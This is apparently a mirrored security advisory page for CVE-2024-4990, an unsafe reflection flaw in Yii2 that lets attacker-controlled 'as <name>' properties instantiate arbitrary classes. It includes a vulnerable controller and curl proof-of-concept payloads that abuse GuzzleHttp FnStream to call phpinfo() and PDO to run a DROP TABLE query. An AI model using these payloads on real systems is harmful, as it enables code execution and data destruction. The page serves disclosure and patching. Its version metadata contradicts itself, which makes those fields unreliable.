Ecosyste.ms: Advisories
An open API service providing security vulnerability metadata for many open source software ecosystems.
Security Advisories: GSA_kwCzR0hTQS1jamNjLXA2N20tN3F4bc4AA8mV
Unsafe Reflection in base Component class in yiisoft/yii2
Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.
Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Impact
With some effort malicious code can be injected executed which might be anything ranging from deleting files to dropping database tables
Patches
Not yet patched.
Workarounds
No Work around available
References
Reported Here
in case the link is dead, here is the full description
Description
Yii2 supports attaching Behaviors to Components by setting properties having the format 'as <behaviour-name>'.
Internally this is done using the __set() magic method. If the value passed to this method is not an instance of the Behavior class, a new object is instantiated using Yii::createObject($value). However, there is no validation check that verifies that $value is a valid Behavior class name or configuration. An attacker that can control the content of the $value variable can then instantiate arbitrary classes, passing parameters to their constructors and then invoking setter methods.
Depending on the installed dependencies various kind of attacks are possible.
Proof of Concept
A PoC application was created using composer create-project, as specified in the getting started.
Yii JSON parser was enabled in the configuration:
'parsers' => [ 'application/json' => 'yii\web\JsonParser' ]
A vulnerable controller was added:
<?php
namespace app\controllers;
use yii\base\Component;
use yii\web\Controller;
class ExploitableController extends Controller
{
public function beforeAction($action): bool
{
// Needed only to simplify the PoC
$this->enableCsrfValidation = false;
return parent::beforeAction($action);
}
public function actionVulnerable(): string
{
$fields = $this->request->post();
$myComponent = new Component();
foreach ($fields as $key => $value) {
$myComponent->$key = $value;
}
return "";
}
}
Executing phpinfo()
Following command stores the content of phpinfo() inside info.html:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"GuzzleHttp\\Psr7\\FnStream", "__construct()": [[]], "_fn_close": "phpinfo"}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable > info.html
It leverages the fact that GuzzleHttp\Psr7\FnStream class executes call_user_func($this->_fn_close) inside __destruct(). This class is a default dependency.
Executing arbitrary MySQL queries (blind execution)
If the application is connected to a MySQL database it is possible to exploit the PDO class to execute arbitrary SQL queries:
curl -XPOST -H "Content-Type: application/json" -d '{"as hack": {"__class":"\\PDO", "__construct()": ["mysql:host=127.0.0.1;dbname=test", "test", "test", {"1002": "DROP TABLE test"}]}}' http://localhost:8080/index.php?r=exploitable%2Fvulnerable
Notice that the server will always return a 500 Internal Server Error (because the instantiated class is not a Behavior), however the query is executed, even if we can't receive any output from it. If the query fails we might see a PDO error message (i.e. "Table 'test.foo' doesn't exist"), depending on the app configuration.
Impact
It is not trivial to exploit this bug, because it depends on peculiar characteristics of the target application. However, it looks that there is at least one very popular product built on Yii2 that is severely affected by this vulnerability (allowing to an anonymous user to gain admin access, with an easy exploit).
The consequences of the exploitation could vary from retrieving sensitive information to DoS or unauthorized access.
Occurrences
Permalink: https://github.com/advisories/GHSA-cjcc-p67m-7qxmJSON: https://advisories.ecosyste.ms/api/v1/advisories/GSA_kwCzR0hTQS1jamNjLXA2N20tN3F4bc4AA8mV
Source: GitHub Advisory Database
Origin: Unspecified
Severity: High
Classification: General
Published: 3 months ago
Updated: about 1 month ago
CVSS Score: 8.1
CVSS vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
Identifiers: GHSA-cjcc-p67m-7qxm, CVE-2024-4990
References:
- https://github.com/yiisoft/yii2/security/advisories/GHSA-cjcc-p67m-7qxm
- https://github.com/yiisoft/yii2/commit/628d406bfafb80fc32147837888c0057d89a021e
- https://github.com/yiisoft/yii2/blob/master/framework/CHANGELOG.md#2050-may-30-2024
- https://github.com/yiisoft/yii2/pull/20183
- https://github.com/yiisoft/yii2/commit/62d081f18c3602d09e7d075bba3a0ca5c313f0b4
- https://github.com/FriendsOfPHP/security-advisories/blob/master/yiisoft/yii2/CVE-2024-4990.yaml
- https://github.com/advisories/GHSA-cjcc-p67m-7qxm
Blast Radius: 36.7
Affected Packages
packagist:yiisoft/yii2
Dependent packages: 9,497Dependent repositories: 33,911
Downloads: 23,066,127 total
Affected Version Ranges: < 2.0.49.4
Fixed in: 2.0.49.4
All affected versions: 2.0.0, 2.0.1, 2.0.2, 2.0.3, 2.0.4-1.1, 2.0.4-2.1, 2.0.4-8.1, 2.0.4-9.1, 2.0.4-9.2, 2.0.4-9.3
All unaffected versions: 2.0.4, 2.0.5, 2.0.6, 2.0.7, 2.0.8, 2.0.9, 2.0.10, 2.0.11, 2.0.12, 2.0.13, 2.0.14, 2.0.15, 2.0.16, 2.0.17, 2.0.18, 2.0.19, 2.0.20, 2.0.21, 2.0.22, 2.0.23, 2.0.24, 2.0.25, 2.0.26, 2.0.27, 2.0.28, 2.0.29, 2.0.30, 2.0.31, 2.0.32, 2.0.33, 2.0.34, 2.0.35, 2.0.36, 2.0.37, 2.0.38, 2.0.39, 2.0.40, 2.0.41, 2.0.42, 2.0.43, 2.0.44, 2.0.45, 2.0.46, 2.0.47, 2.0.48, 2.0.49, 2.0.50, 2.0.51